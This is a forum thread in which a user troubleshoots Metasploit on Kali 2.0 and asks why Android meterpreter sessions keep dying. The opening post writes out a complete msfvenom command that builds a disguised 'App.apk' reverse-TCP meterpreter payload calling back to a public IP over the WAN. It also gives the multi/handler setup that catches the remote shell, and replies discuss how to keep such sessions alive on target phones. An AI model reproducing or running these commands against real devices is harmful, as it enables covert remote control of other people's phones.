Forum Thread: Problems with MSFVenom on Kali 2.0

I seem to be having problems not with creating the payload but with getting the information from the handler after it connects . I've read different responses on what IP address to use so I've tried them all when creating the payload . I've used my Routers Ip public and private my wlan IP and my computers with port 8080 as well as tried 443 . I seem to be able to get a response on the handler when using my public IP ie 66.yada.yada .yada vs using my wlan 172.yada.yada so I'm assuming the public IP is the way to go . Using others I get no response from the handler .

After the payload is opened it shows opened on the handler as well as date and time then closes with after connecting to a host which I've read is fine as well after the handler connects , it runs and then stops . Below is a copy past of my set up .

This is the payload set up in terminal
msfvenom -p android/meterpreter/reversetcp LHOST=66.yada.yada.yada LPORT=8080 R > App.apk

This is the multi handler set up in metasploit..

msf>use exploit/multi/handler

msf>set payload android/meterpreter/reversetcp

msf>set lhost 66.yada.yada

msf>set lport 8080

msf> set ExitOnSession false

msf>exploit -j

Join the Next Reality AR Community

Get the latest in AR — delivered straight to your inbox.

20 Responses

Is this for a LAN or WAN attack?
Also could you post a screenshot of the metasploit console after you activate the payload on the victim device.

Its a WAN I I've tested the thing on my cell numerous times multiple different ways , my cell being disconnected from my home network at the time . Ill take some screen shots give me 5 mic

Trying to upload screen shots never used this site clicked on attach and no option under "upload new image"

Upload your screenshot on imgur first, then use 'upload image from web' field.

Instead would you be able to upload the text from the terminal?

There are all the images taken from the terminal

The last one just keeps running non stop i get about 200 open and closed sessions .They are in order from start to finish . I don't seem to have a payload problem it seems to be in the multi/handler .

Thanks for any help in advance

I will try to recreate the problem and see if I can find a way to fix this troublesome problem, I will get back to you.

With the second picture when the first Meterpreter session died, did it die straight away or did it take a while. Also since the multi hander was still running you couldn't start another one you will have to kill it first with job -k (id). Then try to start the handler again.

It died after maybe 10-15 seconds

This message reminds me of something I've already seen on the comments of two posts. here and here. Just hit ctrl+f and look for 'second' to get there quick, but I advise you to read all anyway.

I can't reproduce as I'm on Kali 1, but TL;DR Lollipop and Samsung are harder to keep the connection alive.

What phone and android version are you testing ?

MInes a sumsung rooted with a custom liquid smooth rom 4.4.4 and his is a stock rom with 4.4.2 sharp 306sh aquos , I've heard Kali 1 is a better system then 2 any thoughts have you used 2 ?

Never tried kali 2, but from all comments from the people I would not want to try it. Seems a lot of things have bugs or weird behaviour, plus I don't like the interface. I know I know, I could install a new desktop manager and fix the bugs myself. Truth is, I'm too lazy to do that and besides, Kali 1 does its jobs perfectly.

Not saying your problem is related to kali 2, but I might suggest you try getting that if you're not making progress.

Do you have a link for Kali1 ? Seems everything brings up version 2

Sure, there's people opening posts at least once a week about that... look here.

Thanks never got armitage to work right either , every time i ran a scan of my networks IP range none of my other computers showed up and after doing this in metasploit my phone seemed to of showed up in Armitage with its IP to me seems Armitage is not really useful for scanning a LAN without having the other pc's public Ip.

Armitage is a bit buggy, but sometimes you can make things a bit faster.
But if I am doing something new or something than shouldn't fail, I always work mit metasploit console ;)


Does your android have an AntiVirus or a Power Saver app?

No I've tried it on 2 different devices also mine and my brothers only tried his due to mine being rooted and thought that was possibly the problem .

Share Your Thoughts

  • Hot
  • Active